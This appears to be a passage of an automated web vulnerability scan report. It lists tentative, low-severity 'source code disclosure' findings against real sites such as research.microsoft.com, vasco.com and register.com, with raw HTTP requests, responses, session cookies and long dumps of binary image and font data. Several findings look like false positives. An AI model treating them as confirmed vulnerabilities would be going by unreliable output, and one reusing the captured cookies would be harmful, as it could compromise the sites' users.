:..).%I.O...........ej?...d.d...6'...)u.P.M.nu.g.......m.........~...U..w...b&...f.hPa...M.fq#:.0.T.e...9....r....'.'..&.[.. ]..h....I..;J P...~+VEwVW.-.y.XW.I...p..a.H^.U.....]|.i...>.Q.....=ge.x~....8....|.~Q......Oo.$.A...Ll(..d.....9.w.~LDrD;..K....U.c.cg...jz......|-z.s    l....K.BP..W.xz.q..<$@K.D.L\oT......K?._h.Cs. J.N...B...2......._..t.,,..l.m.W..F?....y9.h.(...|7Z..X.p8.......sz9v..s..`..........2}.kK.^.(.6.@.@2..Y..+...........8..i...3.c..U..R....kjw.fsbp.K..L...r..q...3......R..-E&.....B+..V........M..A.....Qe.W9.hA4......V#..!...e$.....        ....b.........j.......J.l.H1v..
...;6.V.H...<)'...JmrH.0.'..V..s. 3E^.B9.M...M.E@s..X.d3........g.W(.:.mH..U-..L..v....S.}.|.k...&.{6..$quYL..;>....D.]SSS....z/.........b...~,_.<.:..uZs...2..T..q'H....[..rB...    4.cg...I...i^.......    ...r9v*...&..%....N..."..C..........g)..T.f..Q..;...s9v....S..V...7.z2.....s~..G!..h'...9...... ra'pe......U....[...V#.[....%o.^.W.-?....D?....e.....8/`#.    .....%%?...
.K
.......;....m.x|gC.<....~.q........9.................:^.....H..."...
..~f....n......n.N@Q.@...Q.......C...qem...m...W'..s.N."...e... .......u+.j63....)tE.w.
...^."s....6... .)w........_..|G1...\......[..V.z..5S~...:.L..*..#..4.Df.....z2....8......M.N ..$..;.m(...s....K.V#...l...z......S28..?.s.l.kk.AQ~%..N#&..~7}..PA.V..`Hy.Ij}......).V.(..^.....nzt..=.t.>h..t.F...c..G.~..L3..t...f.hPa...M.fq#:.0.T.e...9....r...cg.7...$m@.4/.N.cE..d.\.._w
]^...7.{.......V!.cg..R.....n.m.Q..;...s9v..3.... .....L......s~...D$G........P.s9v...n.j6...Qzm.j....-....b..L...NP...s..b......XY.....@(.5l.q<.c.V.%.......e.n..[~6.N._....'N.....D".6R..}}}.p..".H
...r.p........Cooo
...$...p..1...re......Cx...133.....i.8p@..V....t ......o..6..;.?j..>.E....'O.D .@$....gq..A...C.$.......).e..Z.......\m.nF?5P. P7.E....S..~!e....G/r.AQ^..b.#s*..d.....R.d^y0..W.]iA.VT....UxCS)~N......#s9vv...g.l..+..Z.zt...
]O>.f....}.s....~.....7.D__.w"...../^....u.; ~....L..c.....s.g.p.?..........Kx...S.|......s.9s.....O.S.B!E.H$..W..?..?......$m& N.nD.A. .":;;.._.
###x...p..Q.b..{.^/~.._`..}..|.....={.r...;. .....+...@AA.._y...<.f..i=....6.c.;..S.....F@.R..QQ........ .IDAT_xF~!.it.....6.q.cg..X_..D).    o.D).=...&VGDO.m...U-..L.\..`s..c?.Y......f..A.........b...[.r.x....P^^...v.:u
.W.. ....Coo/fgg1;;......6l....{.....Y..........x.....7.....F=w..r.\..    n ...$S..I.lI....(.c[......sU.^....I.yU..U...vb.-y.-.."..$j.)R..
\@.$@l......wz........HqN".=s...3.L...9d.Y...b.....?.]..-[.`..]........\.v{...!../_F2..b....u......G(..w....?~.{..1..x."R.........o..8.<6m.d.8::...~..h..../..u.v.0=
..Bx!......{.......]..o.>.8q.;w.D]].0..._...8ZZZ...X]]........
...q..I.u.]...r.+..C......N...wS1.L..w...N.X...<..U.y?j..P."..=vJ.{.?.x.....A.....x....y...;..Fu8i.U._.P.]5fY.2..e.Y......w.z{{.......n..s....O.............a...?...0.......`aa.7n...O>....#...{...fgg.......78t.....q......._.._....H$p....._<...>.9D".......khmm.....B2.DUU.b..ZZZp..U....x....... ..B.......n...x'@)...4..4..$4MC2..................#.<.P(..H$.....3.<.......bii    ....._.v...87...)...R....s.....\.L;..M.)....k."@B.`..l.s.J1.=....`c.u..=v.    `U.=.H..#W....C...~.]1.....FT..*"[.J./....
...>....\@2.D6.......9.J)..46o..G.y..<....4..9...~....).|.A..............@....8.x.    <..C..k.^z.%d.Yd2..;w....x..'....b..........Fq..E|.....={.~.za...4".....a...H$.d2.p8....^...t.....l6k.%.`0.J)2..a...0~..................$.I|.[.....e<..Cx....g.............C..7...v........\...F?;.$......~....../.Q..    =.J.....:g..3[...Z ..C...=v.AS.Zt....co".Y...D..cg.....i$.D.C..8.....^.^....c..X2.+.c..fq..Q.B!.....}...~.9?..".
...P(........i...6.&..u~~..D..WWW.....QSS........Q.&.....~.3.Y.....g,c.n..qzz.....><8I.N.d..+......b...--.>.....H$.H$b.x....J....o..W_..s.p..A..i............5k0<<...>,,,..W^1d.|..+DWA...r..6..l....wZ\........@5...E"....~..N..H.z..`|~.7.....*...~...:._.r..$.......0....\.:_...../..*.cw..........=...B...=....G.?T.y677cii    ...G,.......F..+V....0.]....&.8q.]].'....0>>...~..q...[z..............g...?.XZZ........j.*.....z.*..4FFF.j.*LLL .J!.L:..{]7...rb!..Nuuu..........{.]]].......".H`..-...E&.A ....$ZZZ.i.(.......'.......3hllDOO..}.]A.].s......N.:._l.M...=vA......j...(?...p[.9..)......    ...L.......u@#Ad.....0y    X.....t...    .F.6+...-5.,Y1..@5_..gg4....G......qdi:.m./v......].7/....7O..U...TP....X(....^.....A...a..u.....l....D.o......Ccc#>..O.'?.    4M...,...^a...+..O....w.......?..?G__......?.8......x....FO..7.|.o...N.>..{...>.......o....../`.......w.....A<...hnn.s.=...!|.+_1v...]..v....
*..H....'.......o.........F....~.G.y..v.Bgg'......I... ...R....`..5hjj......8..'N........k.........v....Tq7{..."F.e.8fn$.....5......*!... ...P]]-([...    .>.....J.lG.:y.......#...%^hAy....G;.%..
..|
.. 6.<....8~.9di.....7..<....TH..u.e...w7....G*&[.J./.l/....1_U.@,.y....a..5FO.......Ni.3).x..w:.F*.B,..`..3..@w.......y.B!.B!.v..A..%'...Oc....*.....
n':d2.......;11...+s..rcc......g..><<....Pm=..wrm.FN.$W.Q.J..cgWH.kk..l.Sz"...H.m.c..]..h...s#...N.k.q...f....u.........v...{......g.R..d.W....e.*..tM...N5..\O^UU..Q.......:.OUU...W..pRd.>.........d...LE........)...D..........'...,G....z....k...[.@>.......X...    .....,.r6|..V,....X......0...t...*... .W..E'.K}..<.vk.Mqo.+|.z..x8..H..K;....^....Z.Nl)....cg'..=..}..|/.epZTx]7v..-.D'.n.Jy..\.....b...V.#.    ........*....o-5......YO.S.Y...t........fL..[.....I.6..g/`t.b~[J.w.......N4U.AP.(i....TqW.YV..=v<.4.vI.n........hq.AP..B<ep.77q...!.z%.......F.7...].'.+..Fv..Bo..A<.....8.....S...
66Y..j0.|*...c...0.S7pe....K..x.......aO/f..............-C...Sv.x...|/S..].N..b..d;......^
.e..w?.... .p?.G...~..B.C*.Q..=........-..l../k.....~s..i$.u...
%0p......<....{.l.Q....h..Bb....b.^.w/.B...Tq,..7y.]>.
*Q..J...X../.t':..[,...w...].......N.K..[[.@>......N....T.|.{...;.U..}.o`13..\ .N........#.u.{....u"..S....b.^..r...A'...w~..k.28-*....D..w....E.<.k...n.s/=v.w..@.<.],..T...G.....Z....G$=...ZV\..2.~.........N.......c...AO....}.3Kc..s%....;v..h...G?.m.r..d[q.E...s.n.........>}z....#.R)..m.... ...z...8..;|...qvO..:.A."...y\U...k$.......Idh..].+{\..n~N's.+........og....'.......A.N...\.........lX........,....9q.D.....e....._N.^pA."...8......[.

..@.z..A..T...;v...l...LgF.}..;.n.E....Uy.<G..c........(...N.A]....n....T....R..
*q<$.}..S.<..*......1.o~....Fg....]\+..=v6.../....Bk..hD..k>....^.^....c..X2...;OP
=x....B.....v..Kg.....q.f.=vvE...R>..V'...N.U...V.    .M.p&....n..;.=M..&.....!.]...=v..
...B    4..(....b.^..r...A'...w~..k.28-*....D..w....E.<.k...n.s/=v.w..@.<..x.....~...H....P.......B..vA.....f.F.5S.w....."q'.......Q,.{f.D.U.....V...`..-.-......,+.../.R.-n7.J..P...N..&.~.=.Q...v......h........be...n.....Uh..$.%
.........M\U...:.U......=.i~.......a...:.....Z*<..Qp|.o..3.V...Zt%v.7....r.2T.9e..Wh..qW..].N..b..T..-..~n...YF.~..^..
....pD.....)..7.r.e...5.@w.]..j?.=v..f.k..#3}.^.......6.....P...AW....q.^.z+......^.?;.*.%........C...p..+...v..Kg.....q.f.=vvE...R>..V'...N.QJ.P..m5.n........O..4..N."#...<...;^....H.Z.{......'.X......Bk..-%.].{....p..Ua.
.....$.....f..x|ff........(n....355...q..<......+.....^..].w.;.    ....p..e,,,.....E.....MMMY.g.Y...crrR.........q333.t..R.....|/.e.T.M.....;G..(.g.',.O..Z.......O....d....[.;vk..Q.m..k..Tv.:.xB..P[[J.w....+.kDCsu..#M7....{..%.V./c.....}...........`...>..A....S.......,.8~.8..=......./..".....C.    ..._.....4.....7..`....C....g..?..?".3.E..-...<.......q..)<..S . .
..'..........T..Z...x...../..?77.....8{.,..4.l...|.+x...p..YLLL.._..V.X.._~..d.....=....87.........*..w...e.|.^J.<.*h.........N_    .....%.V.k;<..9...C.A...w..4t%.aE.N....,..D~.x......txng.z.._u...e..{+......mBP........._N.^pA.
....~.?...o......#........`ii    .T
MMM......"._....%.aaa...........h..........<.......-[.`....rE.....`hh..pX.}zz.....w..]..q|.[.....q.]w.c....../`.............r}..|P,.+,..b...x..G.m.6<...x..W../}    ......8u..~..........ahh....w..D..o|...mC__.v.....q......\.|...w.0?.}....:P......3....9...@....}A"..(..(.*v.9..2~...Ur.......X.......q..'.aja.+....j.XxY........+.....y...5X.t.......\.....bG....!...L...M......-.%.+.B#.4U.CM..rM.k.......z/'.Tk.d..Xg..N.8..o.>.......8r..>...!........w/...1>>...6|.+_..o....."..b``.[.n...W./../.....w......a~~...|.....k.p..a.....}.Y.>}..H.g..AGG.x.....7....Z... ..baaA...f.L&../}    O?..e......M!...Jw..!..H._........>....s.N.>>>..^x..>. Z[[..MMM....K..q.5m6.E]]....0<<...^...{..y3...m........,G....z...cW...j.........Q.m.......~......4a}..1>..........<...;^....P.........]a.....^....Z.Nl)..*.c7>>.S.N..{...U.033.../.......x......}'O.......K/....$........KKK.d2....g>..tww..._..>.9|...@8..K/....%......+..w/.....K_.....2.....b.....0??....UUU..u.a.....}...........nT.C^p':..a,--..w........Ai.>{..Y...b....4M._SS............V.Z..6`..]..bX.f...p..tww..........N...y/...o.*.wS1....9..@.<..Tu.T.U~T..r....~..N....e.&...ha.oz.....'.".Msr.....e.e}..U..AU....r..\.%.V./C....'q...|.{......]...k.v.ZPJ.............
...FA.L&.a...........y.f....hoo..U.@.......k.a..u....A455a....f........rK..g...S....O...Vi..8.)+..Yh...nm..b.....7.x.....6l....*.<y..V.Bss.R...4.z.)LLL.._..Q4777..^}.U466..._Fuu5.}.]<..cX.b......`G.7...2w..j^.q..c....h*F.J.\....WzcU7.%.C(.+h[..}..7.N<.........F..i....&.......%.....-.......t.....u[i..t...r.../.:.....C....~..................$.@.4a...........D:....8......`..D.......C:...................,...066.t:-..N....O...S.......W.R.t:.................X.W....3.<........MMM..........q..el....`.{..................5$.I.w.h....8q..v...........ZZZ......_.;.......$...;.A..~..H...N....q.m........4W...x.P...b.e.<]5....v6.t.:..@Wb..F.@:..w......R...E.5.n.......
]o..{......g.R..d.W.;v.........;......6.s.=.d28q..T......7..g..o.[.9r.(.....`..U...l.$w.}.A...Foo/~.....g.....-...g.....F<..+.....z
'O...K...K/affF._).......Jw..!..X..l.{....~.;.......ACC....1;;.d2i.........LMM..w.....
M..w.^................;....D"..'Obdd.(.y.|.\.n9.p.wi...;F.|....'.......3..H.c.D"..n.1..o..bE......g'.iq).wk.......T...a.....x..lZ....8......Zv...G.........%..f-6.>..........$c...T.....BV...=v...Z.G..;....-.cG.....t$.@P......
.<...\.|s*....I.C1h.......55....'K...f.hmm...k.
.
.h4...f...........+...z.Y...6l@6.E:...m..u.V.......+W.D8.FOO.fff@..=...m.....
......DOO......D.s.Nl....D..ovv....hhh@8.F8.F[[.jjj@)EKK..s .@SS.V.X!..N........O;z!|ttT.....i.......199.u..a.......!..d.k..E0.....ylmmE:.FWW.........F....D".T*.../....G8.F2....(V.\...7".
.:...v...b..|<*....Y.S.@8.3....\.4.'$.g.R..^..0<........5H..T..)
oE.{.*..C6...._...+.5....>.:.}}.....$.w|......q.Yd.............,,....j"-...)$b..n.>T....1_U.@,....@.6.[c..+.^.|..,...-...i..?...<..;^q.......O....l.*..t..@.....faa..*g.. .IDAT.UUU....E.B!..l9.V....0.2.B..`..`o.....@1...{.Tz;...l..V....... 6.>......n../d<..1{.7q.f.g$.Go..X.....1diF.=*....[F[...@..&?...N.....[...e.4.r.....:.....Lg;evs.!.4.(BTt..../.Tr..../.^
.?.\.z.4..A.H$".un..[..n..3.$......~......T..ls.t..U...o.8...%.R..2q.n.Gf<.H...cn.xM.....`..QdhJ.......+.-%..k.........B.[..^.w/.B...Tq,........*......EO.....;...Jw........q7.m....z......+.V'...N..n.Lw.hh..Ew.]...Q<..Tn<L.2],.....'~......3.+.....7........r..K....;v......DZ.:y/4...g ..G+4.)...^nz.5.....N.....1p#..=..}..|/.epZTx]7v..-.D'.n.Jy..\.....b.u..;M.(...J.S.d1..5k....|x...iPJ.......*..G..Bz..1.o......^...t........fL.h.Z........0.0,.D..*.DZ.L...R.....5x.B.7C/....."X....P.....e.@.w..e....;.c..n}.d~q;&./Z.n..bC..O......[>..].z%.......F.7......be...n.......4...."..S.e_.x~..).....6...-....S......{.\.....    aU.=h...!...g.u.....).h.&...GW.."......uKw..[z)@.Q........... ...~.+V!....5.../..U....E[....8<.k,.g..*W..G....y...<.:.v..@..ad..#.X......U..z...X..5=.JlC0.quM.Y....^....j..L....y.    ....U._6.....4FFF.[.<.......1.......|...v....N..........|74.../THy..    ....q.l3.T`e......s#."K.BA....
.S...K.f.C..fmr7j..8s.%,...~...i..#..    .cg......?....n7y.]M..k.w.*.p-...{#..y..s9.*.Uc......c..o.h*.@...|.9@.o..E?F.,D......
.....{..#.........).V.~......WX/.p.
...`ja.W.N..Kz.f.1.&..S..Z..+....k.a>uC/h.    .M..r.c....v5..n..... 6.|...V......e........=v..:.....Ib..g...9j^o....K.@.%....Q.U....K...U`.1g.5._T...}`<.JG9.;...+..l..Y.i.!7...d.f?.%.;.#.Qn...b.`W4.#K%[........-...D......T.V...p..S'.O.Wcs..8s...K.    ..e<..E.....[....{nt-....
..o..u.e.r.A-.M..d|5dp....-..U.R./......3K.gq7.W.].*\...\... .../.)7....?........u..1g.o.G.*..z..E".k.......K.l........Q..qGE...N!G..+.Q..X.Jw;...m...g.
7.Oy9:..2...N..x....j"..m.8Fg.0.0.;o..%...)..%.Ao.......H.D...k/..R.;v..c.t/.....|........j..0..N...%y..!...t.....{    .72.1K...T...{.....p.VNqa..Z.T..2..7...<Q.N...Pb...Q<O...V.W.. .S..........blu..|.t.Ne....z-.h....Z.@...,....s..E...X....4..S'@..n....8....4.....3..@...f#..>.p0.w]......N.^..r...A'...w.u .`.(...........+..P.w.....,.....k. .    a.....5.....{...b.%.<X..I.......|.9..,.u.~Q...{f.......$.7.~....^?"...C......q..c.....|...\.]..._1......Z>...5....Yb.....n...h....@*3...Y..q.&.;v....o.....=...`....[n...TqW.YV.2]..%.'j....$1%.i...k.`.. C...I..J,c
....$*..ET....$.a>..9.$e......w.3S[..&.i.2.?...^cR.i.q%b........c...,V....&_Jz![d<.....Ali{..`.Nw..C....m...=8s.e..&E...<.........U........q9....f..2T.9e...x......q...K.K..|K...g<&....S....k.PX.I.<.2..~..B..+.~..B....q.m......m.R..0z..Go.... .S.[.|.e.g.s...*lly.............8.}..a.$8.m.c......Z.F(.S.g.f..3......^.?;.*.%...:._..../..k@_.~..0...$..#.q..a.M~.<...Yl........+.V'...N...T.9...Qlh..z......p.s.M...&.6?.......(.'9.`s.....B.....c../._C}....>..h..ueG/..-D.z...^h:..d.S....#Fqf.....C._....eqg............^w....~...w...=v..X...<..U.e?......@....... G.r<`...4]...Qdi...3o.,    ..N.{..s7.^.m...GP_...    ...r..\...j......~.q>Q.. .$.).O..~....et..j.0.8..YV.US..;s...w...O.Y.L;..M...B...c.:l..,...=w.....&?..X'...@:...&..|..o..p.N.....C.WH.......(8...b...'.P....+...h;4...../..u..Pi...]4^.u&g,.~...'/.....-..#....;..O-....k.PX.I.<.2..~..B..+.~..B....q.m......m*z(....O`s.. ...
-~|{.ft7|.....bz&...[\................DS.Zlm.."....+F/f.........v,U.K.{.uf.N..].........c'.2.!Ig.HE\.C.y..1..=v..o...=v6....    ....q.9.m^..@.......G.........*ll}............$.r../../S......?...R.....Q.n..n.....i....c......[J.;.:.
0b.g.|q..8.z!G.e.G.....k...1'\.%.../....;?..q.{..@.<..x.....~T.+./.d.BO.....8..I...7....\.......
...\z.N .:...3.-.....M...&.\.@)..../.......8d...K.O.F.H.IbJ..6..k..g.]...?..N.u..G......y+.....SD.+..Fv./%..-n.` ...`...FKu/"....<..M...1P.....s..S..C.e:.o4...._!....xng..x....[
..".jlh.$6.>.H..SW./..U.2T.9e...x......q...K.K..|K...g<&....SKr.0.Z)..~R+O.La..c.......c...'.r.e....t/d.Sz.z5vu?..M.......G...9..b.K....<......{....H.6.<....m}........p.Xj....c..X2...3.u.pi....k@_.~..0...$..#.q..a.M~.<...Yl........+.V'...N...T...^.mAo....f.....-:...n9........cW<.X..M....v#.Z...FE....z...^h:..d.S.3..#Fqf.....C..rtP.{t.,...V...s..Y...........n..`.0.".H.L}.716Wu...a....G-.+......./...*?..y......V........`>5a..E.    .....I..u:Q..7^L.l......T..n .uP^...n+z..."Ls9.4x%e....'z,.o..c.'9.'#..l&c.B...DL..]....6..;....#]W.be..Gkv4.D..U.zG..X....2.......B.....X8YL.P.N.u .....:.....)S...=vyv........./.B....B.."....{........".:.8..=..8$\...i.-z*.B..."...
..o..u.e.[.@CM....?..m.B,...f^!.Uz......).h....qT...;n&_D.=v~...w..N!G..+.Q..X.J.B..C.......X.x/.....Rll....../.<......z.4.@[.&lm{..u[...e].......z.B/...K..K.{.uf.N..].........c'.2.!Ig.HE\.C.y..1..=v..o...=v6....    ....q.9.m..G.q.i...Z...5...7...9M...M.......^.N`mr76.<.D....k..E!z%d{...M/....R2....P...83..k].!..9:(.=.l...^..H.9..,.u.~Q.....q....c......./...*?..y..X<...\..u.6$b]8?.&R.y.;...cWH.R.......`M....u ...*..~..f........{.......+..?Z..A'"....;....;?.~.......}+Vf.........R.<._.h..k.?.{W.%:......O#...    ...{.b.....*o{..+8^..*....v.F...4c{..pg..Bc|.Q.-.:..m.e.Pi...]4.a...-I....^    w5.p......h..K..F..-)(...._.jg%.-.`oc.&.(.NU>.....D".]..*.P..,...9]%...Ha........S..w.J}.m......m..U:.D....O....h.Z....eo.s....n..J...t=v.A<....wbg..h.....<....J..z.{......Z.%...:._....A..t............q."..!........;...c...7..9...P....e.+VT.Ls#.iq).wk.......
.VN....@.].m..u...Y.N....0(..../f....p.(..eL.^......OG...../Ju.H8.......m    j.t.mAk..$b...".......n9t.......lW.)7n..Z'B...C~.....B.`^../..............!$q} w..8Pf...~....5.9.......N.8..|.C....#.Z..:...#.fbN..t.    .......NL.%..k.<... ....N9..    j......2q.{..@.<..x{..vt..U...Y>.....XY..4W......8...2.....B.
...@S|V5...X;BZT....".^J^W.\A*.Bww.........Aggg..NNNbqq......T*...1...!..    .ggg....s.T
333.drz.....H.Vf!.+.C............%.$)....q/U...;....Y*.r....^..l)../N.... ..F.4....._X.x/..M..._<.{...%..$X.^..t}    wv}.M.k...EFq.../......./..........A.."..".N.k3.Ja||.....q....s......q...]............7t.....+W.....___.~....W...~......+7M..<....[.>..q...jV../>.....j.bE.(.[RP.K......J&[...F.;*l(G.*..z..E".........K.l......Ba....{.......#.mM.^.Nw.
.....]>....e9.X.....|......m......bc.'1S..C.g02...... %........Z.#.~M..&._..8..z.._....d..,...@C<R..X.:H#....B...>.J...z).......$...q..9l.......p.....033...6.X........42.....066.....@OO....166.P(....#.....l6.../bpp..0==-....Q.:t.SSS.}....q.F.....x..H.$k.dq...u\!}.k......\=...Z.    g)....    .y.....&.....V..ob...R.i    q......U&.......qd>.l..0F..1....T.I".3$..B.../;.uL.[..../...;.~..B.|...N ....+d[9qo~ ..4.:.Dk....]...9..]B&..(...._..G.]M..m...X...h+HK.W.O..'.Dmmm.?. .L.#........4.]....f.X..G....M.0;;..^x...?...Q..9r.w.q..^.....\.t    ....G?.Q.....w...m.p..5........._G8..[o....^..q.7n..tjmm...>...O.0.A&......^..J)....g..$...k.../.........7.r .-..G.u..Z....cw.....s....w+d...U~T...g.}gW....&.D<......Y......6u....Q.    ......V..w.MP....]....$bm......j.Bu.h..lJq...cll...[."....6==..W......D........!..h.w.q.FFF.......c..u+v.....:.....4.....e..~.m.\..;v.......s.....@nW....;v.....&''..B.....r..^.....hhh..C.p...<...ym\.......M]Wj&L. r.6..t"...|>.|....q/6.Af.e..T4T.f.}U...d\.^a..fg...<.*h../.^L\.....    . ..Ec|.64.#3}.:u.S.CXL. CSL:T..*o...i.N...R.... .p.
.P-..=h...x.A...\.>+p*o{.x)x].~.333.........8u..6m..p8,.[..h.f..@.4D.Q.......i..!......T*.B.jkk...QUU...n...{7E.x..F..r.2.-....
.KYP.b$D&.Hjz..w.U.'.Z.[...@xc..g.#.u.........0v.dP...a...N9*. ......0.....U.I.A!..q/O...;....*.../..U.;-...Km.!..@..u..Z..S.C......a...avi........._. .;.5.W6..~    .9qx....p4T.x..u.64Tu....!-.....{1.R..l6....`.....{7.....'N...5k.y.z{{q..Q..A...caaA..v.Z<...hhh..+W.1....3g.............v-...8x. V.Z...Ocvv..V...s..~.........A..WH.i.BOv.5@..l..u-....GrF.......Y01~.<....q.@.N.(.....f^...W..............vU.V.J..[..nx...o..........j\:....    .,.ar.
n.]...0....|Q.P....r..".D..u.V........%..q'h..V.<_q..g.]CC....@).....^....V\.v.............p..I........H.---...GWW.(.8v..n...p8....#..b~~.........+W.........-|..R.#G.`......'N.....L......."jjj.e...B!G.G9.../c....X...3....5....^.    {.,.......s.A...8Nf....?\..b....,E....e/R.A..f..)..V...v>.%."=...V0<.f.M...~.+.wrv*%>v2v.haxP(..@..T.*Q..L '.R....,.(..d.....Rf....11....+.].C...b...W.......................D...q..r\.....B:.@ `.v...R)h.f...i.`...L&.L&.P(..5n%....(.*...f...8;.'?..%..+&?.|.I..2!.2.:.......
.6.l.....i..]
...[SNIP]...

13.5. http://research.microsoft.com/en-us/um/people/yongrui/ previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://research.microsoft.com
Path:	/en-us/um/people/yongrui/

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /en-us/um/people/yongrui/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 29 Sep 2010 07:08:42 GMT
Accept-Ranges: bytes
ETag: "ce173d26a55fcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:25:05 GMT
Connection: close
Content-Length: 19909

<html>
<head>

<meta name="author" content="Yong Rui">
<meta name="keywords" content="computer vision; multimedia; communication; collabor
...[SNIP]...
<FONT FACE="verdana, arial, sans-serif" size="2">
<% Call GetHeader("People") %>
<MSR-DataIslands>
...[SNIP]...
</MSR-DataIslands>
<% Call GetFooter() %>
</FONT>
...[SNIP]...

13.6. http://vasco.com/ previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://vasco.com
Path:	/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET / HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:31:55 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 25354

<? xml version=1.0" encoding=UTF-8" ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...

13.7. http://vasco.com/login.aspx previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://vasco.com
Path:	/login.aspx

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

Response

13.8. http://www.register.com/font/vag-bold.woff previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.register.com
Path:	/font/vag-bold.woff

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /font/vag-bold.woff HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:09 GMT
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:35 GMT
ETag: "4d4c-e7d4-4aba018246cc0"
Accept-Ranges: bytes
Content-Length: 59348
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/plain; charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive

wOFF..............*$........................DSIG............:6;.GPOS.............4GSUB.............C..LINO.......E.....x..LTSH...?........+...OS/2...Y...X...`..oTVDMX...............kcmap...A........
...[SNIP]...
<.....]I&.n.......x.....O..>..I....Ic..y.A.&.gx.!.e....H2x..y..y.Q..e2.C.!..
....x.l..M.3..._..6........._q....8'.....4.p.o..s..{~.<?....D.K.P.bf....P.;.O.T..O...d....e.P..T...JVI1...:.R-.L.*.P......|.>.f....tf0.i\.Z../...-Jd........d>.c....lg.;..'..5..3>...f...J.L.<VJ..K...2..2.A..[.O2%K&H....,...d..NY..z..o.o....H."x.ng'.A..S.^..{..K.+G...*..;..pb..N......N..v...h...:........q:^'..:...........d..$lxK...V..8i(.YW.R.....D..mG)..F....P....w)..P........5xW.......7.{..P/.T.o.@.......w4..P....A..4...{@..!=Zg..:..wK...4w.[....n...&..UKU..QKT..R..B....].H.........&y;..k...8..7/Z........`.s.u...Y.b.y}.1.X
.V.F..3.Ph...........M5..............,...#..................x.].=N.0..m..r.$......W.T).H(M ....iW"{..44Sp..3]..`.....3.....$.o....-..$...D....P/..$.7....W.g....NyS.*.......-....m)+......!.....h..}lw.w..&N6s..._....._^:..!u...HC.T......6.......1)...j.|..Wkn.........r.FD.|.....F..|..PE......Y=..:.. .W.o.Xq0...wg.................x...    .$Wu ..Y..kdfd...UYU..../ju..I...b...@2 .X.0f......2|[.#Z.....e.C.53.........M.......%"23..[h..9...*^....w.}...    ...'.@..`.
BEh.B....L/K.eqf.\....e.7..Flv.E..`.(B.........UmX.......b0..?.v...........%5.W..|.6....c.3..D......}.. .s....$.^Z.W.I.+$..\.l0$...s..8'.W.u.    6....;.....9..Q..g...f.>..    .........._
....Ig.)..:qhUh[...v
.......C{........C...o.<.D..Y.>;tdh...dxz.....
..L.....n.e..z:S..m....we....}.R1...2.Q    {....".W....R0[.g|.q|.Y....Vq.....c!... .x~!._..UE:....K.T*..1...Rr9......
..H..o    '...._..0..|_.T....~x...8...~..y.?sQ. ..Q...9.G...oFW...J.....\.......z.]O..........>%..d.........u|"~hQ.].../.WY....H.r....,.R...Q..7.........C..G.h,d..Xm.6t...o.6..E..J.Y......Q..4!..t..6....9#...6.EX..q.@...T...=..=...-{..`h.n..7.......V..X...e.y6..........H.q.%.p g....9....v.....,..8<.|.Vj..T.t...3.av9..7....[...........,...}..O.Fbr.m!.qId...D...R%.].dgK`I.[...$..l....i5^<.R...n.#.{li.\.x..T.x..fq.X....w...@.\....T.i.X.e......x}.l..|.*..E.dD.\R.....~..t./N.](LX.`:..7...Zwy....Bf.g..........G8&Z/.:%.D.N....p.zs...z..G....:.m ..."8@0|.0....`=:..ZE.E>..Ot.'...s..;..k4\..q~.j.8P7.$p a..4.L...a...a...}    YB.u@..c..X.........{..{)...... ...o..-.~...HGT"........O(J.......E....;.....bn.&......+C.9..+...b<^.j...m^.....Y....{...\n..L...L..2<r........#..8..@.7/...f.....V.[.`.B.F...........=...+..k.    .I@.[W.:....3.....R8.2 